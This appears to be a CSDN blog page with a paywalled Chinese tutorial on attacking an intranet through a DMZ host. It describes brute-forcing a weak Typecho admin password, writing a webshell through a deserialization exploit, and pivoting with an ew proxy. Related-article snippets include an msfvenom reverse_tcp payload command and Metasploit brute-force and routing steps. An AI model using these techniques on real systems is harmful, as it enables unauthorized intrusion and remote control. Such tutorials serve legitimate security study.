msf+mysql+弱口令爆破_内网渗透 | 手把手教你如何进行内网渗透

最新推荐文章于 2024-02-26 10:29:26 发布
VIP文章 最新推荐文章于 2024-02-26 10:29:26 发布
阅读量1.4k 收藏
点赞数
文章标签: msf+mysql+弱口令爆破
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42347357/article/details/113417020
版权

文章目录结构

888a5857f8390a8f9212f699d12e6d25.png

0x01 DMZ渗透

6eb409ba9bde7d9ae59d81634eb97dff.png

首页

看到DMZ开启了web服务,是一个typecho的cms,后台默认就是/admin

6e795ce6da7cd1f8629330915a934063.png

后台

尝试爆破

f65c04c5bbf3c2782f6ba869536604d1.png

弱口令admin1234

但是找了一圈并没有发现有什么可以利用的,网上有一个反序列化的洞可以用。

6a54870533f0bf50b4aab8a577634058.png

exp

10a98685cbfc9ee4ded6482877bf7333.png

上面呢,就是利用exp将一句话写入当前目录的shellx.php中。

e633bb45977646bd5f90599773d17357.png

get shell

到这里呢,想了想我们的目标是内网,并且防火墙没开,就不考虑提权了。

0x02 跳板及内网探测

现在的目标是将此DMZ服务器当作跳板并探测内网的服务器。

0x2.1 做跳板

采用ew套接字代理,服务器上运行准备好的ew_for_linux64,本地使用proxifier配置如下:

59d58c08c271d3aa2abcb399647a1842.png

a33d7772f69dc9882fb2c5423e88a623.png

代理规则配置如上,可以根据情况具体配置,以上是Windows端的配置,但是渗透难免会用到kali,所以kali也需要配置:

最低0.47元/天 解锁文章
马赛不克
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【网络安全】MSF内网渗透
你在看屏幕的同时,屏幕也在注视着你
06-04 2793
内网渗透超级强悍
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频程,详细的操作过程和原理。
MSF实现远程渗透
WFC1006848997的博客
01-12 2419
MSF实现远程渗透 在本地测试腻了的小伙伴安耐不住,想耍耍远程的朋友,奈何不会msf远程渗透,服务器搭建也不会,那怎么办呢?今天笔者将分享一个让你本地的kali也能耍耍你远方的朋友,上才艺。 0x01环境准备 系统:Kali linux 工具:MSF、 Sunny-Ngrok 0x02环境部署 打开Sunny官网 (www.ngrok.cc),点击注册 完成注册登录,点击隧道管理,点击开通隧道,选择0元白嫖,当然你可以选择其他,笔者只能白嫖 可阅读,确认 隧道协议选择tcp,然后为你的隧道取个名称,选
Kali系统MSF模块暴力破解MySQL弱口令漏洞
最新发布
dzqxwzoe的博客
02-26 861
攻击环境使用KALI系统(使用虚拟机搭建)的Metasploit模块,msfconsole是metasploit中的一个工具,它集成了很多漏洞的利用的脚本,并且使用起来很简单的网络安全工具。这里要特别强调:被攻击的环境必须开启mysql远程登陆服务,通常MySQL开启的端口号是3306,故而一般情况下要求被攻击的服务器开启了3306端口号。
MSF 内网渗透(案例)
3569
06-03 2万+
0x00 前言虽然渗透,但是不常使用msf进行内网渗透,这篇刚好的弥补了 win 和 linux shell 和 msf 的对接的流程。原文 : https://mp.weixin.qq.com/s/sKXWjgaViYsCjG33-5Ey8Q0x01 案例分析实验环境:目标环境:10.0.0.0/24, 10.0.1.0/24攻击主机:10.0.0.5 (Kali), 10.0.0.7 (Win...
ms10_002(极光漏洞)渗透步骤——MSF搭建钓鱼网站
渗透测试
06-07 2032
本文简单介绍了如何使用metasploit针对ms10_002(极光漏洞)进行渗透测试,仅供学习 测试环境 描述 ip 主机 kali2020 192.168.1.113 目标主机 win xp sp3 192.168.1.106 ①启动msf,搜索ms10_002,使用msf中的exploit攻击模块,设置参数 msf6 > search ms10_002 Matching Modules ================ # Name .
利用msf进行内网的木马渗透详细
m0_52332592的博客
11-11 3995
内网渗透木马测试
MSF之攻击web站点漏洞获取目标机器最高权限
世间繁华梦一出
12-22 2354
利用MSF攻击web站点的漏洞获取最高权限方法一:通过web站点,使用无文件的方式攻击利用执行方法二:通过web站点,上传webshell(msfvenom后门木马),返回给msf方法三:攻击其他端口服务,拿到meterpreter 方法一:通过web站点,使用无文件的方式攻击利用执行 如何利用? 这里介绍一个msf的新模块web_delivery 当攻击者拥有部分受害者主机的控制权,但还没有拿到一个完整的shell时,web_delivery就派上用场了。 web_delivery的主要目的是快速和受害者
msf内网渗透
10-29
msf内网渗透
浅谈MSF渗透测试
02-24
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、...
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
MSFconsole(msf渗透神器)window版本,稀缺资源。
MySQL数据库渗透及漏洞利用总结
02-25
Mysql数据库是目前世界上使用最为广泛的数据库之一,很多著名公司和站点都使用Mysql作为其数据库支撑,目前...思想有多远,路就可以走多远,在研究mysql数据库安全之余,对Mysql如何通过msf、sqlmap等来进行扫描、漏洞
msf-mysql弱口令爆破
西部壮仔的博客
02-29 3885
实验环境: 攻击机:kali 被攻击方:windows 7 (phpstudy上的mysql服务) 前提是对方必须开启mysql远程登陆服务,开启了3306端口 如何启动mysql远程登陆,可参考这篇文章 https://blog.csdn.net/qq_45089570/article/details/104569254 开始攻击 use auxiliary/scanner/mysql/mys...
msf手机渗透二(实现外网渗透)
weixin_63204687的博客
11-07 3007
内网穿透官网注册飞鸽内网穿透开通隧道,然后本地端口与公网端口绑定,这样访问公网的所有请求最后都会传入本地端口。在本地生成apk的时候使用公网IP和对应Port而对其进行监听的时候设置本地IP和port。这样app在别人手机上被点击以后会直接链接公网对应IP端口,因为公网的已经和本地的绑定了,并且在电脑监听的时候监听的是本地端口,所以最后链接返回给本地电脑。使用公网开通隧道本质上是一个桥梁作用,连接了不同局域网之间的通信。
渗透知识-内网渗透(详细版本)
热门推荐
Jian Sun_的博客
02-11 2万+
1. 内网安全检查/渗透介绍 1.1 攻击思路 有2种思路: 攻击外网服务器,获取外网服务器的权限,接着利用入侵成功的外网服务器作为跳板,攻击内网其他服务器,最后获得敏感数据,并将数据传递到攻击者,看情况安装长期后门,实现长期控制和获得敏感数据的方式; 攻击办公网的系统、办公网电脑、办公网无线等方式,一般是采用社工,实现控制办公电脑,再用获得的办公网数据,可能是内网的各种登录账号和密码,再获取办公网或者生产网的有用数据。 一般内网安全检查使用第一种思路,实际的攻击2种思路结合实现。 1.2 敏感资
MSF内网渗透实战
hackzkaq的博客
05-17 3731
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全-小熊保安 本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀. 一、MSF生成木马上线目标 1. 生成木马 使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.XXX.XX LPORT=4444 -f ex
弱口令-爆破Mysql
HAKUNAMATATATTA的博客
11-28 1945
mysql弱口令爆破工具 不仅仅是MySQL
Nmap爆破MySQL弱口令漏洞:解决报错Accounts: No valid accounts found
mooyuan的博客
11-23 3290
nmap工具不仅仅能扫描,也可以暴力破解mysql,ftp,telnet等服务。看到这里不要怀疑,在kali系统中查一下到底支持哪些暴力破解功能,命令如下查询结果为如上查询结果包括mysql、ftp、telnet等多个服务的暴力破解。接下来就以MySQL为例讲一下如何就是用nmap进行暴力破解获取MySQL弱口令漏洞,以及如何解决windows下小皮工具搭建的MySQL服务无法渗透成功的问题。
msf+mysql+弱口令爆破_msf各种弱口令爆破 - osc_zfz9ur01的个人空间 - OSCHINA - 中文开源技术交流社区...
weixin_28938701的博客
01-19 147
Msf:写的很乱 记录下msf各个爆破弱口令的模块run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24使用arp_scanner模块 检测在线主机metasploit 增加路由route add 10.10.1.3 255.255.255.0 1使用扫描模块use scanner/portscan/tcp爆破sshMsf>use ...
linux内网渗透反弹shell
08-03
在Linux内网渗透中,反弹shell是一种常见的技术手段。其中,Bash反弹shell是最简单且最常见的一种方式。首先,在攻击机上使用nc命令监听一个端口。然后,在目标机器上使用Python脚本去反向连接攻击机的IP和端口。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值